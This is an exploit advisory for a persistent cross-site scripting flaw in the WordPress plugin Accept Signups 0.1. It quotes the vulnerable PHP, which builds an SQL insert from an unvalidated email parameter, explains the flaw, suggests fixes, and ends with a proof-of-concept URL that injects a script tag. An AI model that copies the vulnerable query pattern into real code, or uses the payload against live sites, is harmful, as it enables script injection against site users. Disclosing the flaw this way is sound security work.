# Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS
# Date: 21/12/2010
# Author: clshack
# Software Link: http://wordpress.org/extend/plugins/accept-signups/
# Version: 0.1
# Tested on: wordpress 3.03
# CVE :

Vulnerable code (accept-signups_submit.php):

require_once('../../../wp-config.php');//*addslashes* to GET and POST

$e=$_GET['email'];

function saveEmail($e) {
    global $wpdb;
    $tbl = '`' . DB_NAME . '`.`' . $wpdb->prefix . 'accept-signups`';
    $q = "insert into " .$tbl . " (email, ip, timestamp) value ('$e', '". $_SERVER['REMOTE_ADDR'] . "', now());";
    return $wpdb->query($wpdb->prepare($q));
}

Why it is vulnerable: $_GET['email'] is taken with no validation at all (no is_email()/sanitize_email() check) and concatenated straight into the INSERT string. The $wpdb->prepare($q) call adds no protection here: the user value has already been interpolated into $q, and prepare() is invoked with no placeholders and no arguments, so nothing is escaped. The addslashes that wp-config.php applies to GET/POST only neutralises quote characters for the SQL string; it leaves HTML such as <script> tags intact, so the payload is stored verbatim and will execute wherever the plugin later renders the stored addresses without output encoding (that display code is not shown here), which is what makes the XSS persistent rather than reflected. Remediation: reject anything that is not a valid e-mail address before saving, bind the values instead of interpolating them, e.g. $wpdb->prepare("INSERT INTO ... (email, ip, timestamp) VALUES (%s, %s, NOW())", $email, $ip), and escape on output with esc_html().

PoC:
http://localhost/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72, 101, 108, 108, 111, 32, 58, 68, 32))</script>